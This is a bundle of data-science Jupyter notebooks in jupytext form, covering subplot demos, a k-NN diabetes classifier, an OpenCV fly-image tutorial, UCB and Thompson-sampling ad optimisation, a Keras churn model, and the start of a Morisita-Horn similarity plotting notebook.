plt.subplot(312)
plotFromAllUsersData( columnAllData, columnAllData.columns[2], columnAllData.columns[4] )
plt.grid(True)

#plt.subplot(133)
# Fix: was plt.subplot(331) — same transposition; the third slot is 313.
plt.subplot(313)
plotFromAllUsersData( columnAllData, columnAllData.columns[2], columnAllData.columns[5] )
plt.grid(True)

plt.subplots_adjust(top=0.92, bottom=0.08, left=0.10, right=0.95, hspace=0.25, wspace=0.35)
plt.show()

# +
# 2x2 grid demo
fig = plt.figure()
ax1 = fig.add_subplot(221)
ax1.plot([1,2,3,4,5], [10,5,10,5,10], 'r-')
ax2 = fig.add_subplot(222)
ax2.plot([1,2,3,4], [1,4,9,16], 'k-')
ax3 = fig.add_subplot(223)
ax3.plot([1,2,3,4], [1,10,100,1000], 'b-')
ax4 = fig.add_subplot(224)
ax4.plot([1,2,3,4], [0,0,1,1], 'g-')
plt.tight_layout()
fig = plt.gcf()

# +
# 1x3 grid demo
fig = plt.figure(figsize=(16,4))
ax1 = fig.add_subplot(131)
ax1.plot([1,2,3,4,5], [10,5,10,5,10], 'r-')
ax2 = fig.add_subplot(132)
ax2.plot([1,2,3,4], [1,4,9,16], 'k-')
ax3 = fig.add_subplot(133)
ax3.plot([1,2,3,4], [1,10,100,1000], 'b-')
plt.tight_layout()
fig = plt.gcf()
# -

def subplotFromAllUsersData(ax, allUsersData, xcolumnname, ycolumnname):
    """Scatter-plot *ycolumnname* against *xcolumnname* into the axes *ax*."""
    plt.title("'" + str(ycolumnname) + "' against '" + str(xcolumnname) + "'")
    ax.plot( allUsersData[xcolumnname], allUsersData[ycolumnname], 'ro' )
    plt.xlabel(xcolumnname)
    plt.ylabel(ycolumnname)
    #plt.show()

# +
fig = plt.figure(figsize=(16,4))
ax1 = fig.add_subplot(131)
subplotFromAllUsersData( ax1, columnAllData, columnAllData.columns[2], columnAllData.columns[3] )
ax2 = fig.add_subplot(132)
subplotFromAllUsersData( ax2, columnAllData, columnAllData.columns[2], columnAllData.columns[4] )
ax3 = fig.add_subplot(133)
subplotFromAllUsersData( ax3, columnAllData, columnAllData.columns[2], columnAllData.columns[5] )
plt.tight_layout()
fig = plt.gcf()
# -

# Start a fresh 1x3 figure every three plots.
for i in range(0,6):
    position = 131 + (i % 3)
    if i % 3 == 0:
        fig = plt.figure(figsize=(16,4))
    ax1 = fig.add_subplot(position)
    subplotFromAllUsersData( ax1, columnAllData, columnAllData.columns[2], columnAllData.columns[3+i] )

# # Automation tests

len(columnAllData.columns)

# Number of unordered column pairs, i.e. the number of graphs to draw.
graphsCount = len(columnAllData.columns) * (len(columnAllData.columns) - 1) / 2
graphsCount

# # TODO FIXME

# ## 1 column of graphs

# graphsProgressBar = FloatProgress(min=0, max=graphsCount)
# display(graphsProgressBar)
# graphsProgressBar.value = 0
# for i in range(0,len(columnAllData.columns)):
#     xcolumnname = columnAllData.columns[i]
#     for j in range(i+1,len(columnAllData.columns)):
#         ycolumnname = columnAllData.columns[j]
#         plotFromAllUsersData(columnAllData, xcolumnname, ycolumnname)
#         graphsProgressBar.value += 1
# print("done in " + str(graphsProgressBar.value) + " steps.")

# ## 3 columns of graphs

graphsProgressBar = FloatProgress(min=0, max=graphsCount)
display(graphsProgressBar)
graphsProgressBar.value = 0
for i in range(0,len(columnAllData.columns)):
    xcolumnname = columnAllData.columns[i]
    for j in range(i+1,len(columnAllData.columns)):
        ycolumnname = columnAllData.columns[j]
        # actual plotting
        position = 131 + (graphsProgressBar.value % 3)
        if graphsProgressBar.value % 3 == 0:
            fig = plt.figure(figsize=(16,4))
        ax = fig.add_subplot(position)
        subplotFromAllUsersData( ax, columnAllData, xcolumnname, ycolumnname )
        graphsProgressBar.value += 1
print("done in " + str(graphsProgressBar.value) + " steps.")
v1.52/Tests/4.2 User comparison tests graphs.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     name: python3
# ---

# +
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import math

df = pd.read_csv('Diabetes.csv')
df
# -

df.head()

df.describe()

df.columns

df.isnull().sum()

df.shape

# **Normalisation step** (min-max scaling of every feature column)

# Same arithmetic as before, written once instead of as eight
# near-identical statements: x -> (x - min) / (max - min).
for kolom in ['Pregnancies', 'Glucose', 'BloodPressure', 'SkinThickness',
              'Insulin', 'BMI', 'DiabetesPedigreeFunction', 'Age']:
    terkecil = df[kolom].min()
    terbesar = df[kolom].max()
    df[kolom] = (df[kolom] - terkecil) / (terbesar - terkecil)
df.head()

# **Rename every field** to a short alias

df = df.rename(columns={'Pregnancies':'P', 'Glucose':'G','BloodPressure':'BP',
                        'SkinThickness' : 'SK', 'Insulin' : 'I',
                        'DiabetesPedigreeFunction' : 'DP'})
df.head()

df.info()

# **Build five new datasets** with the following train/test compositions:
# 1. Rows 1-614 as training set, the remainder as test set;
# 2. Rows 1-461 plus rows 642-768 as training set, the rest as test set;
# 3. Rows 1-307 plus rows 462-768 as training set, the rest as test set;
# 4. Rows 1-154 plus rows 308-768 as training set, the rest as test set;
# 5. Rows 155-768 as training set, the rest as test set.
# Datasets 1-5: the five train/test partitions described above.

# +
df1_latih = df.iloc[0:614]
df1_uji = df.iloc[614:768]

df2_latih1 = df.iloc[0:461]
df2_latih2 = df.iloc[642:768]
frames = [df2_latih1, df2_latih2]
df2_latih = pd.concat(frames)
df2_uji = df.iloc[461:642]

df3_latih1 = df.iloc[0:307]
df3_latih2 = df.iloc[462:768]
frames1 = [df3_latih1, df3_latih2]
df3_latih = pd.concat(frames1)
df3_uji = df.iloc[307:462]

df4_latih1 = df.iloc[0:154]
df4_latih2 = df.iloc[308:768]
frames2 = [df4_latih1, df4_latih2]
df4_latih = pd.concat(frames2)
df4_uji = df.iloc[154:308]

df5_latih = df.iloc[155:768]
df5_uji = df.iloc[0:155]
# -

def knn(df_latih, df_uji, K, akurasi):
    """Count correct K-nearest-neighbour predictions on *df_uji*.

    For every test row, the Euclidean distance to every training row is
    computed over the eight feature columns and the K nearest training rows
    vote on the (binary) class. *akurasi* is the starting hit count (callers
    pass 0). Returns (akurasi, len(df_uji)).

    Assumes column order P, G, BP, SK, I, BMI, DP, Age, Outcome — i.e.
    iloc column 8 is the class label.
    """
    for i in range(len(df_uji)):
        df_latih_copy = df_latih.copy()
        # Euclidean distance from the i-th test row to every training row.
        df_latih_copy['jarak'] = np.sqrt(
            pow(df_uji.iloc[i, 0] - df_latih_copy['P'], 2)
            + pow(df_uji.iloc[i, 1] - df_latih_copy['G'], 2)
            + pow(df_uji.iloc[i, 2] - df_latih_copy['BP'], 2)
            + pow(df_uji.iloc[i, 3] - df_latih_copy['SK'], 2)
            + pow(df_uji.iloc[i, 4] - df_latih_copy['I'], 2)
            + pow(df_uji.iloc[i, 5] - df_latih_copy['BMI'], 2)
            + pow(df_uji.iloc[i, 6] - df_latih_copy['DP'], 2)
            + pow(df_uji.iloc[i, 7] - df_latih_copy['Age'], 2))
        tetangga = df_latih_copy.sort_values(by='jarak')
        # Majority vote over the K nearest neighbours (labels are 0/1).
        hit_1 = 0
        for j in range(K):
            if tetangga.iloc[j, 8] == 1:
                hit_1 += 1
        hit_k = 1 if hit_1 > K - hit_1 else 0
        if hit_k == df_uji.iloc[i, 8]:
            akurasi += 1
    return akurasi, len(df_uji)

# **Main program**

# +
K = 9
partisi = [(df1_latih, df1_uji), (df2_latih, df2_uji), (df3_latih, df3_uji),
           (df4_latih, df4_uji), (df5_latih, df5_uji)]

# Fix: knn() was previously called twice per partition (once for the hit
# count, once for the test-set size), doubling the runtime of an already
# O(|train| * |test|) routine. A single call returns both values.
semua_akurasi = []
for nomor, (latih, uji) in enumerate(partisi, start=1):
    benar, banyak_uji = knn(latih, uji, K, 0)
    rasio = benar / banyak_uji
    semua_akurasi.append(rasio)
    # (The 'K = n' label reports the partition number, not the K of k-NN.)
    print('K = {} '.format(nomor))
    print('Akurasi :', rasio * 100, '%')
    print(' ')

# Mean accuracy over the five partitions.
total_avg_akurasi = sum(semua_akurasi) / 5

# Fix: the original if/elif chain compared with strict '>', so whenever the
# top accuracy was tied between partitions every branch failed and the
# report silently fell back to partition 1's accuracy. max() is correct.
hasil = max(semua_akurasi)

print('Akurasi rata-rata : ', total_avg_akurasi * 100, '%')
print('Nilai Akurasi terbaik', hasil * 100, '%')
# -
Tube03knn_1301174181.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # Introduction to OpenCV
#
# This notebook introduces the OpenCV basics needed to analyse the fly-arena
# images captured last week (tracking centroids and heading direction). It is
# not comprehensive; see the lecture slides and OpenCV's online docs for more.
#
# ## Installation
# Missing packages can be installed with:
#   pip install opencv_python numpy matplotlib

import cv2
import numpy as np
from matplotlib import pyplot as plt
# This line is necessary to show the images inside the jupyter notebook.
# %matplotlib inline

# Load an image from file. The result is a uint8 numpy array (BGR order).
img = cv2.imread('img_5.jpg')

print(type(img))
print(img.dtype)

# The image is known to be grey-scale, so collapse the three BGR channels.
print(img.shape)
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
print(img.shape)

# Display with matplotlib; outside a notebook use
# cv2.imshow('image', img); cv2.waitKey(0) instead.
plt.imshow(img, cmap='gray')

# Smoothing: several filters were tried (kept below as comments); the
# edge-preserving bilateral filter with a large neighbourhood won out.
kernel = np.ones((5,5),np.float32)/25
#filt = cv2.filter2D(img,-1,kernel)
#filt = cv2.medianBlur(img,5)
#filt = cv2.bilateralFilter(img,7,30,30)
#filt = cv2.bilateralFilter(img,13,30,30)
filt = cv2.bilateralFilter(img,15,5,5)
plt.imshow(filt, cmap='gray')
plt.show()

# Contrast enhancement: local (CLAHE) vs. global histogram equalisation.
clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8,8))
cl = clahe.apply(filt)
plt.imshow(cl, cmap='gray')
plt.show()

equ = cv2.equalizeHist(filt)
plt.imshow(equ, cmap='gray')
plt.show()

# Canny edges on the equalised image vs. the raw image, for comparison.
edge = cv2.Canny(equ,100,250)
edge_o = cv2.Canny(img,100,200)
plt.imshow(edge, cmap='gray')
plt.show()
plt.imshow(edge_o, cmap='gray')
plt.show()

# Binary thresholding: two adaptive thresholds (on the equalised and on the
# merely filtered image) are combined into one mask below.
#ret, mask = cv2.threshold(equ, 120, 255, cv2.THRESH_BINARY)
mask2 = cv2.adaptiveThreshold(equ, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 195, 60)
mask1 = cv2.adaptiveThreshold(filt, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 195, 25)
plt.imshow(mask1, cmap='gray')
plt.show()
plt.imshow(mask2, cmap='gray')
plt.show()
# Union of the two masks' dark (foreground) regions.
plt.imshow(255 - (255-mask1) - (255-mask2), cmap='gray')
plt.show()
mask2 = 255 - (255-mask1) - (255-mask2)

# Morphological clean-up of the combined mask.
kernel_co = np.ones((15,15),np.uint8)
kernel_dil = np.ones((20,25),np.uint8)
closing = cv2.morphologyEx(mask2, cv2.MORPH_CLOSE, kernel_co)
opening = cv2.morphologyEx(closing, cv2.MORPH_OPEN, kernel_co)
# NOTE(review): cv2.erode's third positional argument is `dst`, not
# `iterations` — the `100` here most likely meant iterations=100; confirm
# the intended behaviour.
dilation = cv2.erode(opening, kernel_dil, 100)
plt.imshow(dilation, cmap='gray')
plt.show()

# Invert so the flies (foreground) become the ROI rather than the background.
mask = 255 - dilation
outcome = cv2.bitwise_and(equ, equ, mask=mask)
plt.imshow(outcome, cmap='gray')
plt.show()

edge1 = cv2.Canny(filt,20,255)
edge = edge1 * mask
plt.imshow(edge, cmap='gray')
plt.show()

# Force every pixel outside the ROI to white in the adaptive mask.
mask3 = mask2
ids = np.argwhere(mask.flatten() == 0)
print(ids)
mask3_fl = mask3.flatten()
mask3_fl[ids] = 255
mask3_fl = mask3_fl.reshape(mask.shape[0], -1)
print(mask3_fl.shape)
#plt.scatter(ids.T[1], ids.T[0])
plt.imshow(mask3_fl, cmap='gray')
plt.show()

img1 = img * (255-mask3_fl)
plt.imshow(img1, cmap='gray')
plt.show()

th = mask3_fl

# +
# circular 5x5 kernel: zero out the four corner cells of an all-ones kernel
kernel = np.ones((5,5),np.uint8)
for i in [0,4]:
    for j in [0,4]:
        kernel[i,j] = 0
        kernel[j,i] = 0

# contours of the edge image
# NOTE(review): the 3-value return is the OpenCV 3.x API; OpenCV 4 returns
# only (contours, hierarchy).
con = edge.copy()
_, contours, hierarchy = cv2.findContours(con,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
con = cv2.drawContours(con, contours, -1, (255,25,25), 6)
# -

plt.imshow(con, cmap='gray')
plt.show()

# +
#morphology filters
#th = cv2.morphologyEx(th,cv2.MORPH_OPEN, kernel)

# flood-fill from the corner so closed edge contours (fly bodies) get filled
h, w = th.shape[:2]
mask = np.zeros((h+2, w+2), np.uint8)
fill = con.copy()
cv2.floodFill(fill, mask, (0,0), 255)

# dilate/erode to get a better shape of the flies
fill = cv2.dilate(fill,kernel,iterations = 1)
fill = cv2.erode(fill,kernel,iterations = 2)

# remove grid lines: any row/column that is mostly dark is blanked out
y_size = fill.shape[0]
x_size = fill.shape[1]
lines = fill.copy()/255
for x in range(x_size):
    if np.sum(lines[:,x])<(y_size*0.85):
        lines[:,x-12:x+12] = np.ones((y_size,24))
for y in range(y_size):
    if np.sum(lines[y,:])<(x_size*0.75):
        lines[y-12:y+12,:] = np.ones((24,x_size))
lines = lines*255
# -

plt.imshow(lines, cmap='gray')
plt.show()

# The image has to be inverted because the flies are the ROIs, not the
# background. Connected components can then be analysed with OpenCV's
# connectedComponentsWithStats.
# NOTE(review): `mask` at this point is the (h+2, w+2) flood-fill scratch
# buffer, not the fly mask — `lines` (inverted) or `fill` looks like the
# intended input here; confirm.
output = cv2.connectedComponentsWithStats(mask, 4, cv2.CV_32S)
label_img = output[1].astype(np.uint8)
centroids = output[3]
sizes = output[2][:, 4]

# Keep the 7 largest components (assumed to be the flies).
largest_ids = np.argsort(sizes)[::-1][:7]
largest = centroids[largest_ids]
sizes[largest_ids]

plt.imshow(label_img)
plt.scatter(largest.T[0], largest.T[1])
plt.show()

print('Centroids', output[3])
print('Sizes', output[2][:, 4])
jupyter/opencv_introduction.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # Advertisement CTR optimisation

# # Upper Confidence Bound (UCB)

# ## Importing the libraries

import numpy as np
import matplotlib.pyplot as plt
import pandas as pd

# ## Importing the dataset

dataset = pd.read_csv('Ads_CTR_Optimisation.csv')

# ## Upper Confidence Bound Algorithm
#
# Step 1 — at each round n keep, per ad i:
#   N_i(n): the number of times ad i was selected up to round n
#   R_i(n): the sum of rewards of ad i up to round n
# Step 2 — compute the average reward r_i(n) = R_i(n) / N_i(n) and the
#   confidence half-width delta_i(n) = sqrt(3 * log(n) / (2 * N_i(n))),
#   giving the interval [r_i(n) - delta_i(n), r_i(n) + delta_i(n)].
# Step 3 — select the ad i with the maximum UCB r_i(n) + delta_i(n).

# ## Implementing UCB

import math
N = 1000
d = 10
ads_selected = []
numbers_of_selections = [0] * d
sums_of_rewards = [0] * d
total_reward = 0
for n in range(0, N):
    ad = 0
    max_upper_bound = 0
    for i in range(0, d):
        if (numbers_of_selections[i] > 0):
            average_reward = sums_of_rewards[i] / numbers_of_selections[i]
            delta_i = math.sqrt(3/2 * math.log(n + 1) / numbers_of_selections[i])
            upper_bound = average_reward + delta_i
        else:
            # Never-selected ads get an infinite bound so every ad is tried
            # once first. Fix: was the obscure overflow literal 1e400, which
            # only works because it happens to evaluate to inf.
            upper_bound = float('inf')
        if upper_bound > max_upper_bound:
            max_upper_bound = upper_bound
            ad = i
    ads_selected.append(ad)
    numbers_of_selections[ad] = numbers_of_selections[ad] + 1
    reward = dataset.values[n, ad]
    sums_of_rewards[ad] = sums_of_rewards[ad] + reward
    total_reward = total_reward + reward

# ## Visualising the results

plt.hist(ads_selected)
plt.title('Histogram of ads selections')
plt.xlabel('Ads')
plt.ylabel('Number of times each ad was selected')
plt.show()

# # Thompson Sampling
#
# Step 1 — at each round n keep, per ad i:
#   N1_i(n): the number of times ad i got reward 1 up to round n
#   N0_i(n): the number of times ad i got reward 0 up to round n
# Step 2 — draw theta_i(n) ~ Beta(N1_i(n) + 1, N0_i(n) + 1) for each ad.
# Step 3 — select the ad with the highest theta_i(n).

# ## Implementing Thompson Sampling

import random
N = 500
d = 10
ads_selected = []
numbers_of_rewards_1 = [0] * d
numbers_of_rewards_0 = [0] * d
total_reward = 0
for n in range(0, N):
    ad = 0
    max_random = 0
    for i in range(0, d):
        random_beta = random.betavariate(numbers_of_rewards_1[i] + 1, numbers_of_rewards_0[i] + 1)
        if random_beta > max_random:
            max_random = random_beta
            ad = i
    ads_selected.append(ad)
    reward = dataset.values[n, ad]
    if reward == 1:
        numbers_of_rewards_1[ad] = numbers_of_rewards_1[ad] + 1
    else:
        numbers_of_rewards_0[ad] = numbers_of_rewards_0[ad] + 1
    total_reward = total_reward + reward

# ## Visualising the results - Histogram

plt.hist(ads_selected)
plt.title('Histogram of ads selections')
plt.xlabel('Ads')
plt.ylabel('Number of times each ad was selected')
plt.show()

# The goal is to find the highest-converting ad in as few rounds (users) as
# possible, since more rounds mean more cost for the advertiser. UCB needs
# at least 1000 rounds to single out ad 4, while Thompson Sampling detects
# it in only 500 rounds — so Thompson Sampling performs better than UCB here.
Ads-CTR-Optimisation/Ads_optimise.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] id="lP6JLo1tGNBg" # # Artificial Neural Network # + id="VC45bT-kLXtj" executionInfo={"status": "ok", "timestamp": 1602179924025, "user_tz": 300, "elapsed": 741, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="3786baff-9f2a-4930-9329-d315f9bb6ee4" colab={"base_uri": "https://localhost:8080/", "height": 55} from google.colab import drive drive.mount('/content/drive') # + [markdown] id="gWZyYmS_UE_L" # ### Importing the libraries # + id="eRa__MBINE8e" executionInfo={"status": "ok", "timestamp": 1602179925797, "user_tz": 300, "elapsed": 2495, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} import numpy as np import pandas as pd import tensorflow as tf # + id="Y_EtOxyzNKX7" executionInfo={"status": "ok", "timestamp": 1602179925801, "user_tz": 300, "elapsed": 2483, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="3433772c-b40b-4d6d-84d6-e3094c8c547a" colab={"base_uri": "https://localhost:8080/", "height": 36} tf.__version__ # + [markdown] id="1E0Q3aoKUCRX" # ## Part 1 - Data Preprocessing # + [markdown] id="cKWAkFVGUU0Z" # ### Importing the dataset # + id="NlAepGobNkc7" executionInfo={"status": "ok", "timestamp": 1602179925804, "user_tz": 300, "elapsed": 2466, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="8be9b9da-6393-40fa-87a0-0a5ac9b704af" colab={"base_uri": "https://localhost:8080/", "height": 226} df = pd.read_csv('/content/drive/My Drive/Data/Churn_Modelling.csv') df.head() # + id="-q7byvQbUORe" executionInfo={"status": "ok", "timestamp": 1602179925812, "user_tz": 300, "elapsed": 2463, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": 
"09152436479381660151"}} df.drop(['RowNumber', 'CustomerId', 'Surname'], axis=1, inplace=True) # + id="6x3KPJpmOIk7" executionInfo={"status": "ok", "timestamp": 1602179925814, "user_tz": 300, "elapsed": 2451, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="29b5d0db-d110-4b9d-e9d8-932b3b415ddc" colab={"base_uri": "https://localhost:8080/", "height": 146} print(df.iloc[:, :-1].values) # + id="H6-y41cGOKyK" executionInfo={"status": "ok", "timestamp": 1602179925817, "user_tz": 300, "elapsed": 2437, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="46779c85-2dc5-4fbd-c2cc-01de2b84017a" colab={"base_uri": "https://localhost:8080/", "height": 35} print(df.iloc[:, -1].values) # + [markdown] id="N6bQ0UgSU-NJ" # ### Encoding categorical data # + [markdown] id="le5MJreAbW52" # Label Encoding the "Gender" column # + id="RKCM68s9Pt2K" executionInfo={"status": "ok", "timestamp": 1602179925819, "user_tz": 300, "elapsed": 2431, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} df['Gender']= np.where(df['Gender']=='Female', 0, 1) # from sklearn.preprocessing import LabelEncoder # le = LabelEncode() # X = df.iloc[:, :-1].values # X[:, 2] = le.fit_transform(X[:, 2]) # + [markdown] id="CUxGZezpbMcb" # One Hot Encoding the "Geography" column # + id="Su18A0C3Tqhf" executionInfo={"status": "ok", "timestamp": 1602179925819, "user_tz": 300, "elapsed": 2418, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="45a26149-c63a-4a16-f267-bad0b95afd85" colab={"base_uri": "https://localhost:8080/", "height": 226} df = pd.concat([pd.get_dummies(df['Geography']), df], axis=1) df.drop('Geography', axis=1, inplace=True) df.head() # from sklearn.compose imoprt ColumnTransformer # from sklearn.preprocessing import OneHotEncoder # X = df.iloc[:, :-1].values # ct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [1])], 
remainder='passthrough') # X = np.array(ct.fit_transform(X)) # + [markdown] id="vHol938cW8zd" # ### Splitting the dataset into the Training set and Test set # + id="LTP-gI-cXv_b" executionInfo={"status": "ok", "timestamp": 1602180054868, "user_tz": 300, "elapsed": 455, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} X = df.iloc[:, :-1].values y = df.iloc[:, -1].values # + id="ZiRY8azDX5Fr" executionInfo={"status": "ok", "timestamp": 1602180066857, "user_tz": 300, "elapsed": 1131, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="a0d39625-65de-42fe-b7d0-8739b181e576" colab={"base_uri": "https://localhost:8080/", "height": 256} print(X) # + id="wzPvgnkNX8I8" executionInfo={"status": "ok", "timestamp": 1602180076739, "user_tz": 300, "elapsed": 740, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="b73f4664-dedd-4e8c-babe-4fddd19316ec" colab={"base_uri": "https://localhost:8080/", "height": 35} print(y) # + id="FgTcYQdZXjsb" executionInfo={"status": "ok", "timestamp": 1602180219485, "user_tz": 300, "elapsed": 507, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0) # + [markdown] id="RE_FcHyfV3TQ" # ### Feature Scaling # + id="i3A4CQoJYArN" executionInfo={"status": "ok", "timestamp": 1602180240483, "user_tz": 300, "elapsed": 498, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} from sklearn.preprocessing import StandardScaler sc = StandardScaler() X_train = sc.fit_transform(X_train) X_test = sc.transform(X_test) # + [markdown] id="-zfEzkRVXIwF" # ## Part 2 - Building the ANN # + [markdown] id="KvdeScabXtlB" # ### Initializing the ANN # + id="niONB_83Y5Td" executionInfo={"status": "ok", "timestamp": 1602181064470, "user_tz": 300, 
# (continuation of the cell marker that starts on the previous line)
# Build the ANN as a plain stack of fully-connected layers.
ann = tf.keras.models.Sequential()

# + [markdown] id="rP6urV6SX7kS"
# ### Adding the input layer and the first hidden layer

# + id="PZhEDe34ZgF9"
# try with 7 and check the accuracy
ann.add(tf.keras.layers.Dense(units=6, activation='relu'))

# + [markdown] id="BELWAc_8YJze"
# ### Adding the second hidden layer

# + id="uWv4SWiNaky8"
ann.add(tf.keras.layers.Dense(units=6, activation='relu'))

# + [markdown] id="OyNEe6RXYcU4"
# ### Adding the output layer

# + id="KgEqrPMeaoAd"
# Single sigmoid unit -> probability of the positive class.
ann.add(tf.keras.layers.Dense(units=1, activation='sigmoid'))
# for non-binary classification, the activation function should be 'softmax'

# + [markdown] id="JT4u2S1_Y4WG"
# ## Part 3 - Training the ANN

# + [markdown] id="8GWlJChhY_ZI"
# ### Compiling the ANN

# + id="OdWOpbOybyNN"
ann.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
# for non-binary classification the loss function should be 'categorical_crossentropy'

# + [markdown] id="0QR_G5u7ZLSM"
# ### Training the ANN on the Training set

# + id="uDdcAuXUdf7b"
ann.fit(x=X_train, y=y_train, batch_size=32, epochs=100)
# batch_size = 32 is the default parameter - it is an important hyperparameter
# epoch is another important hyperparameter that should not be a small number
# because ann needs a certain amount of epochs to learn properly

# + [markdown] id="tJj5k2MxZga3"
# ## Part 4 - Making the predictions and evaluating the model

# + id="ntmgfDNye15M"
# Single-customer prediction (this is the solution to the homework described
# in the markdown below). Feature order must match the training matrix:
# one-hot geography first, then the remaining columns.
customer = [[1, 0, 0, 600, 1, 40, 3, 60000, 2, 1, 1, 50000]]
customer = sc.transform(customer)  # reuse the scaler fitted on the training set
print(ann.predict(customer))

# + [markdown] id="84QFoqGYeXHL"
# ### Predicting the result of a single observation

# + [markdown] id="CGRo3eacgDdC"
# **Homework**
#
# Use our ANN model to predict if the customer with the following informations will leave the bank:
#
# Geography: France
#
# Credit Score: 600
#
# Gender: Male
#
# Age: 40 years old
#
# Tenure: 3 years
#
# Balance: \$ 60000
#
# Number of Products: 2
#
# Does this customer have a credit card ? Yes
#
# Is this customer an Active Member: Yes
#
# Estimated Salary: \$ 50000
#
# So, should we say goodbye to that customer ?

# + [markdown] id="ZhU1LTgPg-kH"
# **Solution**

# + [markdown] id="wGjx94g2n7OV"
# Therefore, our ANN model predicts that this customer stays in the bank!
#
# **Important note 1:** Notice that the values of the features were all input in a double pair of square brackets. That's because the "predict" method always expects a 2D array as the format of its inputs. And putting our values into a double pair of square brackets makes the input exactly a 2D array.
#
# **Important note 2:** Notice also that the "France" country was not input as a string in the last column but as "1, 0, 0" in the first three columns. That's because of course the predict method expects the one-hot-encoded values of the state, and as we see in the first row of the matrix of features X, "France" was encoded as "1, 0, 0". And be careful to include these values in the first three columns, because the dummy variables are always created in the first columns.

# + [markdown] id="u7yx47jPZt11"
# ### Predicting the Test set results

# + id="Hfyfn8bchH9A"
# Threshold the predicted probabilities at 0.5 and print predictions next to
# the ground-truth labels, side by side.
y_pred = ann.predict(X_test)
y_pred = (y_pred > 0.5)
print(np.concatenate((y_pred.reshape(len(y_pred), 1), y_test.reshape(len(y_test), 1)), 1))

# + [markdown] id="o0oyfLWoaEGw"
# ### Making the Confusion Matrix

# + id="dq3VYJxEh7Cr"
from sklearn.metrics import confusion_matrix, accuracy_score
cm = confusion_matrix(y_test, y_pred)
print(cm)
accuracy_score(y_test, y_pred)

# + id="WuOez4ZSiQj7"
# ---- source file: artificial_neural_networks/artificial_neural_network.ipynb ----
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Plotting Morisita-Horn similarity # # In our manuscript, we use Morisita-Horn similarity to compare repertoires across subjects. Details of how we calculated MH similarity, as well as code and data, can be found [**here**](LINK). In this notebook, we're going to make the following three figure panels: # # * Line plot of intra- and inter-subject MH similarity (**Figure 1d** and **Extended Data Figure 3**) # * Clustermap of pairwise MH similarities (**Figure 1g**) # * Bar/scatter plot of MH similarity by isotype class (**Figure 1h**) # # The following Python packages are required to run the code in this notebook: # * numpy # * pandas # * scipy # * matplotlib # * seaborn # * [abutils](https://www.github.com/briney/abutils) # # They can be install by running `pip install numpy pandas scipy matplotlib seaborn abutils` # + from __future__ import print_function import os import re import sys import numpy as np import pandas as pd import seaborn as sns import matplotlib.pyplot as plt import matplotlib as mpl from scipy import stats from abutils.utils.color import truncate_colormap, hex_to_rgb from abutils.utils.pipeline import list_files import warnings warnings.filterwarnings('ignore') # %matplotlib inline # - # ### Comparison class # # This class makes it easier to read, manage and process the MH similarity data for a single pairwise comparison. 
# Input is a string containing the similarity information for a single comparison (read directly from the MH similarity output file, which can be generated with [**this code**](LINK))

class Comparison(object):
    """Parsed Morisita-Horn (MH) similarity data for one pairwise comparison.

    ``raw_data`` is the text chunk for a single comparison read from the MH
    similarity output file: the first line lists the subject name(s), and each
    subsequent non-empty line holds a subsample size followed by the MH scores
    computed at that size. Derived values (subjects, scores, means, ...) are
    parsed lazily and cached in the private ``_``-prefixed attributes.
    """

    def __init__(self, raw_data):
        super(Comparison, self).__init__()
        self.raw_data = raw_data
        self.raw_lines = [l.strip() for l in self.raw_data.split('\n')]
        # lazily computed caches for the properties below
        self._subjects = None
        self._comparison_type = None
        self._sizes = None
        self._scores = None
        self._means = None
        self._color = None
        self._primary = None

    @property
    def subjects(self):
        # Unique subject names from the header line, sorted alphabetically.
        if self._subjects is None:
            self._subjects = sorted(list(set(self.raw_lines[0].split())))
        return self._subjects

    @property
    def primary(self):
        # "Primary" subject, set by the caller to orient inter-subject plots.
        return self._primary

    @primary.setter
    def primary(self, primary):
        self._primary = primary

    @property
    def secondary(self):
        # The other subject of an inter-subject comparison; None when the
        # primary subject has not been set or the comparison is intra-subject.
        if self._primary is not None:
